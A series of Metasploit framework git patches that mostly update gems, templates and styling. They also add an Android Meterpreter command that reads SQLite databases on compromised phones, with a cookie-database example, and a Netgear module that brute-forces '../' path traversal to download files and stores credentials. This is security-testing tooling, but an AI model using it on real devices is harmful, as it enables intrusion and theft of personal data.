babbec853a..d88467fd73 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb @@ -80,6 +80,13 @@ TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS TLV_TYPE_ACTIVITY_START_RESULT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9102) TLV_TYPE_ACTIVITY_START_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9103) +TLV_TYPE_SQLITE_RESULT_GROUP = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9080) +TLV_TYPE_SQLITE_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9081) +TLV_TYPE_SQLITE_QUERY = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9082) +TLV_TYPE_SQLITE_RESULT_COLS = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9083) +TLV_TYPE_SQLITE_RESULT_ROW = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9084) +TLV_TYPE_SQLITE_VALUE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9085) + end end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index ce4748dcef..0ec0beca07 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -30,7 +30,8 @@ class Console::CommandDispatcher::Android 'send_sms' => 'Sends SMS from target session', 'wlan_geolocate' => 'Get current lat-long using WLAN information', 'interval_collect' => 'Manage interval collection capabilities', - 'activity_start' => 'Start an Android activity from a Uri string' + 'activity_start' => 'Start an Android activity from a Uri string', + 'sqlite_read' => 'Query a SQLite database from storage' } reqs = { @@ -45,7 +46,6 @@ class Console::CommandDispatcher::Android 'interval_collect' => ['interval_collect'], 'activity_start' => ['activity_start'], 'sqlite_read' => ['sqlite_read'], - 'sqlite_write' => ['sqlite_write'] } # Ensure any requirements of the command are met @@ -547,13 +547,13 @@ class Console::CommandDispatcher::Android print_error("Error: #{result}") end end - -def cmd_sqlite_write(*args) + + def cmd_sqlite_write(*args) results = client.android.sqlite_write("SELECT 1") p results -end + end -def cmd_sqlite_read(*args) + def cmd_sqlite_read(*args) path = "sqlite_read_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt" read_opts = Rex::Parser::Arguments.new( @@ -572,7 +572,7 @@ def cmd_sqlite_read(*args) end end - results = client.android.sqlite_read("") + results = client.android.sqlite_read("/data/data/com.metasploit.stage/files", "SELECT * from accounts"); p results end From 5899b8afc8299057a9dff8e5f8f7d7dc7dcfd759 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Fri, 26 Feb 2016 06:09:05 -0600 Subject: [PATCH 421/686] make help show up when things are not specified correctly --- .../ui/console/command_dispatcher/android.rb | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index b8a3ec8df8..adf2bc5865 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -156,24 +156,31 @@ class Console::CommandDispatcher::Android end def cmd_set_audio_mode(*args) + help = false mode = 1 set_audio_mode_opts = Rex::Parser::Arguments.new( '-h' => [ false, "Help Banner" ], - '-m' => [ true, "Set Mode - (0 - OFF, 1 - Normal, 2 - Max) (Default: '#{mode}')"] + '-m' => [ true, "Set Mode - (0 - Off, 1 - Normal, 2 - Max) (Default: '#{mode}')"] ) set_audio_mode_opts.parse(args) do |opt, _idx, val| case opt when '-h' - print_line('Usage: set_audio_mode [options]') - print_line('Set Ringer mode.') - print_line(set_audio_mode_opts.usage) - return + help = true when '-m' mode = val.to_i + else + help = true end end + if help || mode < 0 || mode > 2 + print_line('Usage: set_audio_mode [options]') + print_line('Set Ringer mode.') + print_line(set_audio_mode_opts.usage) + return + end + client.android.set_audio_mode(mode) print_status("Ringer mode was changed to #{mode}!") end From 1427887efe97296c7d0c8e5391dba3a8d34f58f8 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Fri, 26 Feb 2016 06:10:02 -0600 Subject: [PATCH 422/686] update payloads --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 4cf7c7588b..c444691e07 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ PATH metasploit-concern (= 1.0.0) metasploit-credential (= 1.0.1) metasploit-model (= 1.0.0) - metasploit-payloads (= 1.1.0) + metasploit-payloads (= 1.1.1) metasploit_data_models (= 1.2.10) msgpack network_interface (~> 0.0.1) @@ -124,7 +124,7 @@ GEM activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-payloads (1.1.0) + metasploit-payloads (1.1.1) metasploit_data_models (1.2.10) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 0aba1e8d59..4998484a90 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.0.0' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.1.0' + spec.add_runtime_dependency 'metasploit-payloads', '1.1.1' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From bc050410a6abe5442b90eb8c4375b92d9fa684fa Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Fri, 26 Feb 2016 10:52:30 -0600 Subject: [PATCH 423/686] Allow max traversal depth as an option, and report cred --- .../admin/http/netgear_auth_download.rb | 43 +++++++++++++++++-- 1 file changed, 40 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/admin/http/netgear_auth_download.rb b/modules/auxiliary/admin/http/netgear_auth_download.rb index 84fa875840..c79e02e6c4 100644 --- a/modules/auxiliary/admin/http/netgear_auth_download.rb +++ b/modules/auxiliary/admin/http/netgear_auth_download.rb @@ -41,6 +41,11 @@ class Metasploit4 < Msf::Auxiliary OptString.new('PASSWORD', [true, 'Password for the specified username', 'admin']), OptString.new('FILEPATH', [false, 'Path of the file to download minus the drive letter', '/Windows/System32/calc.exe']), ], self.class) + + register_advanced_options( + [ + OptInt.new('DEPTH', [false, 'Max depth to traverse', 15]) + ], self.class) end def authenticate @@ -146,16 +151,48 @@ class Metasploit4 < Msf::Auxiliary print_good("File saved in: #{path}") end + def report_cred(opts) + service_data = { + address: rhost, + port: rport, + service_name: 'netgear', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :service, + module_fullname: fullname, + username: opts[:user], + private_data: opts[:password], + private_type: :password + }.merge(service_data) + + login_data = { + last_attempted_at: DateTime.now, + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::SUCCESSFUL, + proof: opts[:proof] + }.merge(service_data) + + create_credential_login(login_data) + end + def run cookie = authenticate if cookie == nil fail_with(Failure::Unknown, "#{peer} - Failed to log in with the provided credentials.") else - print_good("#{peer} - Logged with successfully.") + print_good("#{peer} - Logged in with #{datastore['USERNAME']}:#{datastore['PASSWORD']} successfully.") + report_cred( + user: datastore['USERNAME'], + password: datastore['PASSWORD'], + proof: cookie + ) end - if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty? + if datastore['FILEPATH'].blank? fail_with(Failure::Unknown, "#{peer} - Please supply the path of the file you want to download.") return end @@ -171,7 +208,7 @@ class Metasploit4 < Msf::Auxiliary print_error("#{peer} - File not found, using bruteforce to attempt to download the file") count = 1 - while count < 15 + while count < datastore['DEPTH'] res = download_file(("../" * count).chomp('/') + filepath, cookie) if res && res.code == 200 if res.body.to_s.bytesize != 0 && (not res.body.to_s =~/This file does not exist./) && (not res.body.to_s =~/operation is failed/) From 6060c7b09bdb6f022a3cc9a115b78752de8a692f Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Fri, 26 Feb 2016 14:15:54 -0600 Subject: [PATCH 424/686] We make this pretty --- data/markdown_doc/default_template.erb | 27 +++++++++++++----------- data/markdown_doc/markdown.css | 29 +++++++++++++++----------- 2 files changed, 32 insertions(+), 24 deletions(-) diff --git a/data/markdown_doc/default_template.erb b/data/markdown_doc/default_template.erb index e1f3e38e50..8941608034 100644 --- a/data/markdown_doc/default_template.erb +++ b/data/markdown_doc/default_template.erb @@ -1,6 +1,7 @@ ## <%= items[:mod_name] %> - +<p> <%= normalize_description(items[:mod_description]) %> +</p> ## Module Name @@ -10,6 +11,15 @@ <%= normalize_authors(items[:mod_authors]) %> +<% unless items[:mod_platforms].empty? %> +## Platforms +<%= normalize_platforms(items[:mod_platforms]) %> +<% end %> + +## Reliability + +<%= normalize_rank(items[:mod_rank]) %> + ## Related Pull Requests <%= normalize_pull_requests(items[:mod_pull_requests]) %> @@ -27,18 +37,11 @@ <% end %> -<% unless items[:mod_platforms].empty? %> -## Platforms -<%= normalize_platforms(items[:mod_platforms]) %> -<% end %> - -## Reliability - -<%= normalize_rank(items[:mod_rank]) %> - -<% unless normalize_options(items[:mod_options]).empty? %> -## Mandatory Options +## Required Options +<% if normalize_options(items[:mod_options]).empty? %> +No options required. +<% else %> <%= normalize_options(items[:mod_options]) %> <% end %> diff --git a/data/markdown_doc/markdown.css b/data/markdown_doc/markdown.css index d5323c73bb..034ba8cca5 100644 --- a/data/markdown_doc/markdown.css +++ b/data/markdown_doc/markdown.css @@ -4,14 +4,14 @@ h3, h4, h5, h6, -p, +p, blockquote { margin: 0; padding: 0; } body { - font-family: "Helvetica Neue", Helvetica, "Hiragino Sans GB", Arial, sans-serif; - font-size: 13px; + font-family: Arial, "Helvetica Neue", Helvetica, "Hiragino Sans GB", sans-serif; + font-size: 16px; line-height: 18px; color: #737373; margin: 10px 13px 10px 13px; @@ -27,7 +27,7 @@ a img { border: none; } p { - margin-bottom: 9px; + margin-bottom: 16px; } h1, h2, @@ -44,18 +44,23 @@ h1 { } h2 { font-size: 24px; + margin-bottom: 16px; } h3 { font-size: 18px; + margin-bottom: 16px; } h4 { font-size: 16px; + margin-bottom: 16px; } h5 { - font-size: 14px; + font-size: 16px; + margin-bottom: 16px; } h6 { font-size: 13px; + margin-bottom: 16px; } hr { margin: 0 0 19px; @@ -76,7 +81,7 @@ blockquote:before { color:#eee; } blockquote p { - font-size: 14px; + font-size: 16px; font-weight: 300; line-height: 18px; margin-bottom: 0; @@ -89,17 +94,17 @@ code { background-color: #fee9cc; color: rgba(0, 0, 0, 0.75); padding: 1px 3px; - font-size: 12px; + font-size: 13px; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } pre { display: block; - padding: 14px; + padding: 16px; margin: 0 0 18px; line-height: 16px; - font-size: 11px; + font-size: 13px; border: 1px solid #d9d9d9; white-space: pre-wrap; word-wrap: break-word; @@ -107,7 +112,7 @@ pre { pre code { background-color: #fff; color:#737373; - font-size: 11px; + font-size: 13px; padding: 0; } @media screen and (min-width: 768px) { @@ -118,7 +123,7 @@ pre code { } #overview_info_button { font-family:Arial, sans-serif; - font-size:12px; + font-size:16px; padding:10px 5px; border-style:solid; border-width:1px; @@ -127,7 +132,7 @@ pre code { } #knowledge_base_button { font-family:Arial, sans-serif; - font-size:12px; + font-size:16px; padding:10px 5px; border-style:solid; border-width:1px; From e40f1e69db7252ecdee3d15aff54b30f20ae1b32 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Fri, 26 Feb 2016 14:18:24 -0600 Subject: [PATCH 425/686] Update default template --- data/markdown_doc/module_doc_template.md | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/data/markdown_doc/module_doc_template.md b/data/markdown_doc/module_doc_template.md index 551302e48c..25ec732640 100644 --- a/data/markdown_doc/module_doc_template.md +++ b/data/markdown_doc/module_doc_template.md @@ -1 +1,9 @@ -You can use this as a template for module documentation. \ No newline at end of file +## Vulnerable Application + +## Verification Steps + +## Options + +## Scenarios + + **Demo 1** From 1c53e53d23b16244d6065c8b551efcc27416c6f1 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Fri, 26 Feb 2016 14:24:24 -0600 Subject: [PATCH 426/686] More info about how to write the doc --- data/markdown_doc/module_doc_template.md | 20 +++++++++++++++++++- 1 file changed, 19 insertions(+), 1 deletion(-) diff --git a/data/markdown_doc/module_doc_template.md b/data/markdown_doc/module_doc_template.md index 25ec732640..806b99bc5b 100644 --- a/data/markdown_doc/module_doc_template.md +++ b/data/markdown_doc/module_doc_template.md @@ -1,9 +1,27 @@ ## Vulnerable Application + Instructions to get the vulnerable application. + ## Verification Steps + Example steps in this format: + + 1. Install the application + 2. Start msfconsole + 3. Do: ```use [module path]``` + 4. Do: ```run``` + 5. You should get a shell. + ## Options + **Option name** + + Talk about what it does, and how to use it appropriately. + ## Scenarios - **Demo 1** + Specific demo of using the module: + + ``` + code or console output + ``` From 250ce6fb175df5cdcba454a2f5b51b1474fd571f Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Fri, 26 Feb 2016 14:30:12 -0600 Subject: [PATCH 427/686] lets be clear --- data/markdown_doc/module_doc_template.md | 4 ++++ .../modules/auxiliary/server/browser_autopwn2.md | 11 +++++++++++ 2 files changed, 15 insertions(+) diff --git a/data/markdown_doc/module_doc_template.md b/data/markdown_doc/module_doc_template.md index 806b99bc5b..bcb3f8c8d4 100644 --- a/data/markdown_doc/module_doc_template.md +++ b/data/markdown_doc/module_doc_template.md @@ -1,3 +1,7 @@ +The following is the recommended format for module documentation. +But feel free to add more content/sections to this. + + ## Vulnerable Application Instructions to get the vulnerable application. diff --git a/documentation/modules/auxiliary/server/browser_autopwn2.md b/documentation/modules/auxiliary/server/browser_autopwn2.md index 38f1731b30..d18ce43889 100644 --- a/documentation/modules/auxiliary/server/browser_autopwn2.md +++ b/documentation/modules/auxiliary/server/browser_autopwn2.md @@ -1,6 +1,17 @@ Browser Autopwn 2 is a complete redesign from the first one, so quite a few things will look and feel different for you. Here are the features you should know about before using. +## Vulnerable Applications + +Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins, such as: + +* Internet Explorer +* Mozilla Firefox +* Adobe Flash +* Java +* ActiveX +* Silverlight + ## Exploit URLs Normally, the only URL you need to care about is the **BrowserAutoPwn URL**. This is the URL From b7ba38a4c6699bc27ad2d78c95a99a8fd09d5cdc Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Fri, 26 Feb 2016 14:32:03 -0600 Subject: [PATCH 428/686] update mdm version --- Gemfile.lock | 21 +++++++++------------ metasploit-framework.gemspec | 2 +- 2 files changed, 10 insertions(+), 13 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index c0937476b4..9312d2815c 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -14,7 +14,7 @@ PATH metasploit-credential (= 1.0.1) metasploit-model (= 1.0.0) metasploit-payloads (= 1.1.0) - metasploit_data_models (= 1.2.10) + metasploit_data_models (= 1.2.11) msgpack network_interface (~> 0.0.1) nokogiri @@ -58,8 +58,8 @@ GEM thread_safe (~> 0.1) tzinfo (~> 0.3.37) arel (4.0.2) - arel-helpers (2.1.1) - activerecord (= 4.0.13) + arel-helpers (2.2.0) + activerecord (>= 3.1.0, < 5) aruba (0.6.2) childprocess (>= 0.3.6) cucumber (>= 1.1.1) @@ -125,7 +125,7 @@ GEM activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) metasploit-payloads (1.1.0) - metasploit_data_models (1.2.10) + metasploit_data_models (1.2.11) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) arel-helpers @@ -139,7 +139,7 @@ GEM mime-types (2.6.1) mini_portile2 (2.0.0) minitest (4.7.5) - msgpack (0.7.1) + msgpack (0.7.4) multi_json (1.11.2) multi_test (0.1.2) network_interface (0.0.1) @@ -149,10 +149,10 @@ GEM packetfu (1.1.11) network_interface (~> 0.0) pcaprub (~> 0.12) - pcaprub (0.12.0) + pcaprub (0.12.1) pg (0.18.4) pg_array_parser (0.0.9) - postgres_ext (2.4.1) + postgres_ext (3.0.0) activerecord (>= 4.0.0) arel (>= 4.0.1) pg_array_parser (~> 0.0.9) @@ -200,8 +200,8 @@ GEM rspec-mocks (~> 3.3.0) rspec-support (~> 3.3.0) rspec-support (3.3.0) - rubyntlm (0.5.2) - rubyzip (1.1.7) + rubyntlm (0.6.0) + rubyzip (1.2.0) shoulda-matchers (2.8.0) activesupport (>= 3.0.0) simplecov (0.9.2) @@ -246,6 +246,3 @@ DEPENDENCIES simplecov timecop yard - -BUNDLED WITH - 1.11.2 diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 0aba1e8d59..2cc7fe51fb 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -65,7 +65,7 @@ Gem::Specification.new do |spec| # Metasploit::Credential database models spec.add_runtime_dependency 'metasploit-credential', '1.0.1' # Database models shared between framework and Pro. - spec.add_runtime_dependency 'metasploit_data_models', '1.2.10' + spec.add_runtime_dependency 'metasploit_data_models', '1.2.11' # Things that would normally be part of the database model, but which # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.0.0' From ed0dfa572580b2dc160b2a27ba67b0a3cb432627 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Fri, 26 Feb 2016 14:35:07 -0600 Subject: [PATCH 429/686] basic usage --- data/markdown_doc/default_template.erb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/data/markdown_doc/default_template.erb b/data/markdown_doc/default_template.erb index 8941608034..a771f07991 100644 --- a/data/markdown_doc/default_template.erb +++ b/data/markdown_doc/default_template.erb @@ -45,6 +45,6 @@ No options required. <%= normalize_options(items[:mod_options]) %> <% end %> -## Demo +## Basic Usage <%= normalize_demo_output(items[:mod_demo]) %> \ No newline at end of file From fd8e3e719dadfbe67c561427b20ba19df24f8bb9 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Fri, 26 Feb 2016 14:43:53 -0600 Subject: [PATCH 430/686] real demo --- data/markdown_doc/module_doc_template.md | 10 ++++++++++ .../modules/auxiliary/server/browser_autopwn2.md | 2 +- 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/data/markdown_doc/module_doc_template.md b/data/markdown_doc/module_doc_template.md index bcb3f8c8d4..acc95041fd 100644 --- a/data/markdown_doc/module_doc_template.md +++ b/data/markdown_doc/module_doc_template.md @@ -29,3 +29,13 @@ But feel free to add more content/sections to this. ``` code or console output ``` + + For example: + + To do this specific thing, here's how you do it: + + ``` + msf > use module_name + msf auxiliary(module_name) > set POWERLEVEL >9000 + msf auxiliary(module_name) > exploit + ``` \ No newline at end of file diff --git a/documentation/modules/auxiliary/server/browser_autopwn2.md b/documentation/modules/auxiliary/server/browser_autopwn2.md index d18ce43889..c09b71ff47 100644 --- a/documentation/modules/auxiliary/server/browser_autopwn2.md +++ b/documentation/modules/auxiliary/server/browser_autopwn2.md @@ -135,7 +135,7 @@ Here's an example of setting it to 5 seconds: set ExploitReloadTimeout 5000 ``` -## Application-Specific Testing +## Scenarios By default, Browser Autopwn 2 goes through the entire exploit module tree, and will try to use different types of exploits - Firefox, Internet Explorer, Adobe Flash, Android, etc. If you want to From cbcd4317724a545802013aafdb000883e884f052 Mon Sep 17 00:00:00 2001 From: Fernando Arias <fernando_arias@rapid7.com> Date: Fri, 26 Feb 2016 15:41:39 -0600 Subject: [PATCH 431/686] Updated Gemfile.lock --- Gemfile.lock | 42 ++++++++++-------------------------------- 1 file changed, 10 insertions(+), 32 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 0aa8a5f3d4..b080f4eedd 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,43 +1,40 @@ GIT -<<<<<<< HEAD - remote: https://github.com/rapid7/metasploit-concern.git - revision: cf2dbfc0cf0b60c9561357d00de4ece34058e13b - branch: staging/MS-888/engines-is-deprecated - specs: - metasploit-concern (1.0.1.pre.engines.pre.is.pre.deprecated) -======= remote: https://github.com/rapid7/metasploit-concern - revision: ef10168eea90af393f595d426aadb5ca33dfe031 + revision: b496de4ffc1b2572832333459e617d5eaa946dc5 branch: staging/rails-upgrade specs: metasploit-concern (1.0.1.pre.rails.pre.upgrade) ->>>>>>> staging/rails-upgrade activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) -<<<<<<< HEAD -======= GIT remote: https://github.com/rapid7/metasploit-credential revision: 9aa0cf5812fc7bc27c25e122c9648ffc5798735d branch: staging/rails-upgrade specs: metasploit-credential (2.0.0.pre.rails.pre.upgrade) + activerecord (>= 4.0.9, < 4.1.0) + activesupport (>= 4.0.9, < 4.1.0) + arel-helpers metasploit-concern + metasploit-concern (~> 1.0) metasploit-model (~> 1.0) metasploit_data_models pg + postgres_ext + railties (>= 4.0.9, < 4.1.0) railties + recog (~> 2.0) rubyntlm rubyzip (~> 1.1) GIT remote: https://github.com/rapid7/metasploit_data_models - revision: 97197d0955936ee2f0881dd262951dfc667b905b + revision: aadb1f7e461f7f06ca992331a553a1e7f82894a9 branch: staging/rails-upgrade specs: - metasploit_data_models (2.0.0.pre.rails.pre.upgrade) + metasploit_data_models (2.0.0.pre.rails.pre.4.pre.deprecations) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) arel-helpers @@ -48,7 +45,6 @@ GIT railties (>= 4.0.9, < 4.1.0) recog (~> 2.0) ->>>>>>> staging/rails-upgrade PATH remote: . specs: @@ -61,11 +57,7 @@ PATH jsobfu (~> 0.4.1) json metasm (~> 1.0.2) -<<<<<<< HEAD metasploit-concern - metasploit-credential (= 1.0.1) -======= ->>>>>>> staging/rails-upgrade metasploit-model (= 1.0.0) metasploit-payloads (= 1.1.0) msgpack @@ -161,17 +153,6 @@ GEM mail (2.6.3) mime-types (>= 1.16, < 3) metasm (1.0.2) -<<<<<<< HEAD - metasploit-credential (1.0.1) - metasploit-concern (~> 1.0) - metasploit-model (~> 1.0) - metasploit_data_models (~> 1.0) - pg - railties - rubyntlm - rubyzip (~> 1.1) -======= ->>>>>>> staging/rails-upgrade metasploit-model (1.0.0) activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) @@ -280,10 +261,7 @@ DEPENDENCIES factory_girl_rails (~> 4.5.0) fivemat (~> 1.3.1) metasploit-concern! -<<<<<<< HEAD -======= metasploit-credential! ->>>>>>> staging/rails-upgrade metasploit-framework! metasploit_data_models! pry From bd6fdbb5458dda4d599b57973ad1a1579bb53f54 Mon Sep 17 00:00:00 2001 From: Tim <timrlw@gmail.com> Date: Mon, 29 Feb 2016 15:05:57 +0000 Subject: [PATCH 432/686] android sqlite_read command --- .../meterpreter/extensions/android/android.rb | 16 +++++++-- .../ui/console/command_dispatcher/android.rb | 35 +++++++++++++------ 2 files changed, 38 insertions(+), 13 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index 058cfb3d18..e8d1bd7192 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -288,9 +288,20 @@ class Android < Extension request = Packet.create_request('sqlite_read') request.add_tlv(TLV_TYPE_SQLITE_NAME, dbname) request.add_tlv(TLV_TYPE_SQLITE_QUERY, query) - - p [TLV_TYPE_SQLITE_NAME, TLV_TYPE_SQLITE_QUERY] response = client.send_request(request, 30) + + result = { + columns: [], + rows: [] + } + data = response.get_tlv(TLV_TYPE_SQLITE_RESULT_GROUP) + columns = data.get_tlv(TLV_TYPE_SQLITE_RESULT_COLS) + result[:columns] = columns.get_tlv_values(TLV_TYPE_SQLITE_VALUE) + data.each(TLV_TYPE_SQLITE_RESULT_ROW) do |row| + result[:rows] << row.get_tlv_values(TLV_TYPE_SQLITE_VALUE) + end + + result end end @@ -299,3 +310,4 @@ end end end end + diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 0ec0beca07..d1157f4c3a 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -554,26 +554,39 @@ class Console::CommandDispatcher::Android end def cmd_sqlite_read(*args) - path = "sqlite_read_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt" - - read_opts = Rex::Parser::Arguments.new( + sqlite_read_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], - '-o' => [ false, 'Output path for contacts list'] + '-d' => [ false, 'The sqlite database file'], + '-q' => [ false, 'The sqlite statement to execute'] ) - read_opts.parse(args) do |opt, _idx, val| + database = '' + query = '' + sqlite_read_opts.parse(args) do |opt, _idx, val| case opt when '-h' - print_line('Usage: sqlite_read [options]') - print_line(read_opts.usage) + print_line("Usage: sqlite_read -d <database_file> -q <statement>\n") + print_line(sqlite_read_opts.usage) return - when '-o' - path = val + when '-d' + database = val + when '-t' + query = val end end - results = client.android.sqlite_read("/data/data/com.metasploit.stage/files", "SELECT * from accounts"); - p results + result = client.android.sqlite_read(database, query) + table = Rex::Ui::Text::Table.new( + 'Header' => "table", + 'SortIndex' => 0, + 'Columns' => result[:columns], + 'Indent' => 0 + ) + result[:rows].each do |e| + table << e + end + print_line + print_line(table.to_s) end # From afc6f6ff74c03472dd8e4ce8d0062ca6538787aa Mon Sep 17 00:00:00 2001 From: Tim <timrlw@gmail.com> Date: Mon, 29 Feb 2016 15:21:33 +0000 Subject: [PATCH 433/686] fix options --- .../ui/console/command_dispatcher/android.rb | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index d1157f4c3a..70539bb60e 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -556,8 +556,8 @@ class Console::CommandDispatcher::Android def cmd_sqlite_read(*args) sqlite_read_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], - '-d' => [ false, 'The sqlite database file'], - '-q' => [ false, 'The sqlite statement to execute'] + '-d' => [ true, 'The sqlite database file'], + '-q' => [ true, 'The sqlite statement to execute'] ) database = '' @@ -570,15 +570,22 @@ class Console::CommandDispatcher::Android return when '-d' database = val - when '-t' + when '-q' query = val end end + if database.blank? || query.blank? + print_error("You must enter both a database files and a query") + print_error("e.g. sqlite_read -d /sdcard/Download/webviewCookiesChromium.db -q 'SELECT * from cookies'") + print_line(sqlite_read_opts.usage) + return + end + result = client.android.sqlite_read(database, query) + header = "#{query} on database file #{database}" table = Rex::Ui::Text::Table.new( - 'Header' => "table", - 'SortIndex' => 0, + 'Header' => header, 'Columns' => result[:columns], 'Indent' => 0 ) From bff4b4d5fcb283b4231ae052e58ea97ca0aa0f8e Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Mon, 29 Feb 2016 10:50:21 -0600 Subject: [PATCH 434/686] Fix #6609 and #6587 - Change Content-Length behavior in Rex HTTP This patches changes two things: 1. If a module has a custom Content-Length, it will respect that instead of forcing its own. 2. If a request does not have anything in the body, the Content-Length header will not be set. Fix #6609 Fix #6587 --- lib/rex/proto/http/client_request.rb | 3 ++- .../lib/rex/proto/http/client_request_spec.rb | 21 ++++++++++++++++++- 2 files changed, 22 insertions(+), 2 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index a048138269..f47229a0bb 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -391,8 +391,9 @@ class ClientRequest # # Return the content length header + # def set_content_len_header(clen) - return "" if opts['chunked_size'] > 0 + return "" if clen == 0 || opts['chunked_size'] > 0 || (opts['headers'] && opts['headers']['Content-Length']) set_formatted_header("Content-Length", clen) end diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 644e576a5c..454850ee86 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -151,7 +151,26 @@ RSpec.describe Rex::Proto::Http::ClientRequest do { :set_host_header => { :result => "Host: [2001:DB8::1]:1234\r\n" }, } - ] + ], + + [ + "with modified Content-Length header", + default_options.merge({ + 'headers' => { 'Content-Length' => 1337 } + }), + { + :set_content_len_header => { args: 0, result: ''} + } + ], + + [ + "with 1024 bytes of Content-Length", + default_options, + { + :set_content_len_header => { args: 1024, result: "Content-Length: 1024\r\n"} + } + ], + ].each do |c, opts, expectations| context c do subject(:client_request) { Rex::Proto::Http::ClientRequest.new(opts) } From 53d703355fad5497c1747d951b0a288b91507f2c Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Sat, 27 Feb 2016 